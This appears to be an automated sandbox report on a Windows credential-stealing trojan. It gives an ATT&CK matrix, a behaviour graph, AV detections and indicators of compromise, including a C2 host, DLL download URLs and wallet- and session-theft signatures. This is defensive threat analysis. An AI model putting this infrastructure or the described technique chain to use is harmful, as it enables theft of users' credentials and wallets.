                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts311
                          Process Injection                          		3
                          Obfuscated Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		Logon Script (Windows)Logon Script (Windows)1
                          DLL Side-Loading                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Masquerading                          		NTDS56
                          System Information Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                          Virtualization/Sandbox Evasion                          		LSA Secrets161
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                          Process Injection                          		Cached Domain Credentials2
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540306 Sample: UMrFwHyjUi.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 37 steamcommunity.com 2->37 39 cowod.hopto.org 2->39 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 9 other signatures 2->51 9 UMrFwHyjUi.exe 2->9         started        signatures3 process4 signatures5 53 Contains functionality to inject code into remote processes 9->53 55 Searches for specific processes (likely to inject) 9->55 57 Injects a PE file into a foreign processes 9->57 12 UMrFwHyjUi.exe 1 141 9->12         started        17 WerFault.exe 21 16 9->17         started        19 UMrFwHyjUi.exe 9->19         started        process6 dnsIp7 41 95.217.220.103, 443, 49745, 49747 HETZNER-ASDE Germany 12->41 43 steamcommunity.com 92.122.104.90, 443, 49743 AKAMAI-ASUS European Union 12->43 27 C:\ProgramData\vcruntime140.dll, PE32 12->27 dropped 29 C:\ProgramData\softokn3.dll, PE32 12->29 dropped 31 C:\ProgramData\nss3.dll, PE32 12->31 dropped 35 3 other files (none is malicious) 12->35 dropped 59 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->59 61 Found many strings related to Crypto-Wallets (likely being stolen) 12->61 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->63 65 4 other signatures 12->65 21 cmd.exe 1 12->21         started        33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->33 dropped file8 signatures9 process10 process11 23 conhost.exe 21->23         started        25 timeout.exe 1 21->25         started       

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          UMrFwHyjUi.exe66%ReversingLabsWin32.Trojan.LummaC
                          UMrFwHyjUi.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://player.vimeo.com0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                          http://cowod.hopto.org0%URL Reputationsafe
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                          http://cowod.hopto.0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          http://cowod.hopto0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                          https://store.steampowered.com/;0%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                          http://ocsp.sectigo.com00%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
                          https://store.steampowered.com/stats/0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          steamcommunity.com
                          		92.122.104.90
                          		truetrue
                            		unknown
                            cowod.hopto.org
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://95.217.220.103/freebl3.dlltrue
                                		unknown
                                https://95.217.220.103/nss3.dlltrue
                                  		unknown
                                  https://95.217.220.103/vcruntime140.dlltrue
                                    		unknown
                                    https://95.217.220.103/mozglue.dlltrue
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabUMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://player.vimeo.comUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://steamcommunity.com/login/home/?goto=profiles%2F7656119978660210776561199786602107[1].htm.2.drfalse
                                        		unknown
                                        https://95.217.220.103/OUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/ac/?q=UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#UMrFwHyjUi.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://cowod.hopto.org/bUMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0UMrFwHyjUi.exefalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                              		unknown
                                              https://steamcommunity.com/?subsection=broadcastsUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                		unknown
                                                http://cowod.hopto.orgUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english76561199786602107[1].htm.2.drfalse
                                                  		unknown
                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://cowod.hopto.orgEHIUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                      		unknown
                                                      https://store.steampowered.com/subscriber_agreement/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.gstatic.cn/recaptcha/UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://95.217.220.103/5UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.valvesoftware.com/legal.htmUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.youtube.comUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.google.comUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                              		unknown
                                                              http://cowod.hopto.org_DEBUG.zip/cUMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                  		unknown
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiCAAEBF.2.drfalse
                                                                    		unknown
                                                                    https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                      		unknown
                                                                      http://cowod.hopto.UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://t.me/lpnjokeg0b4cMozilla/5.0UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                          		unknown
                                                                          http://cowod.JDHJKECAKEHIUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://cowod.hoptoUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://s.ytimg.com;UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://steam.tv/UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://95.217.220.103/UUMrFwHyjUi.exe, 00000002.00000003.2560144909.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drfalse
                                                                                    		unknown
                                                                                    https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                      		unknown
                                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#UMrFwHyjUi.exefalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
